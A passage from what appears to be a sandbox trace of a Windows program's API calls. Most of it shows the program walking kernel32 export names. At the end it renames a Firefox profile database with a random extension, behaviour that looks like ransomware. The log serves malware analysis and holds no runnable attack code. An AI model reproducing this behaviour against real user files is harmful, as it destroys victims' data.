returned="CreateDirectoryW" [0082.232] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.232] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.232] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.232] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.232] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.232] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.232] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.232] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.232] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.232] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.233] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.233] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.233] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.233] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.233] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.233] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.233] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.233] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.233] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.233] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.233] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.233] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.233] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.233] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.233] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.233] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.233] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.233] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.234] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.234] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.234] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.234] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.234] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.234] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.234] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.234] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.234] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.234] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.234] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.234] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.234] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.234] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.234] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.234] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.234] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.234] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.234] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.235] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.235] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.235] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.235] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.235] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.235] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.235] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.235] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.235] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.235] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.235] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.235] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.235] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.235] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.235] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.235] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.235] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.235] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.235] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.236] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.236] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.236] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.236] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.236] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.236] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.236] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.236] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.236] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.236] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.236] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.236] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.236] lstrlenA (lpString="DELETEATOM") returned 10 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.236] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.236] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.236] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.236] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.236] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.237] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.237] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.237] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.237] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.237] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.237] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.237] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.237] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.237] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.237] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.237] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.237] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.237] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.237] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.237] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.237] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.237] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.237] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.238] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.238] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.238] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.238] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.238] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.238] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.238] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.238] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.238] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.238] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.238] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.238] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.238] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.238] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.238] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.238] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.238] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.239] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.239] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned 107 [0082.239] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.X4lNw38") returned 115 [0082.239] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.X4lNw38" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite.x4lnw38"), dwFlags=0x0) returned 1 [0082.240] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.240] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.240] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.241] FindNextFileW (in: hFindFile=0x5f8d58, 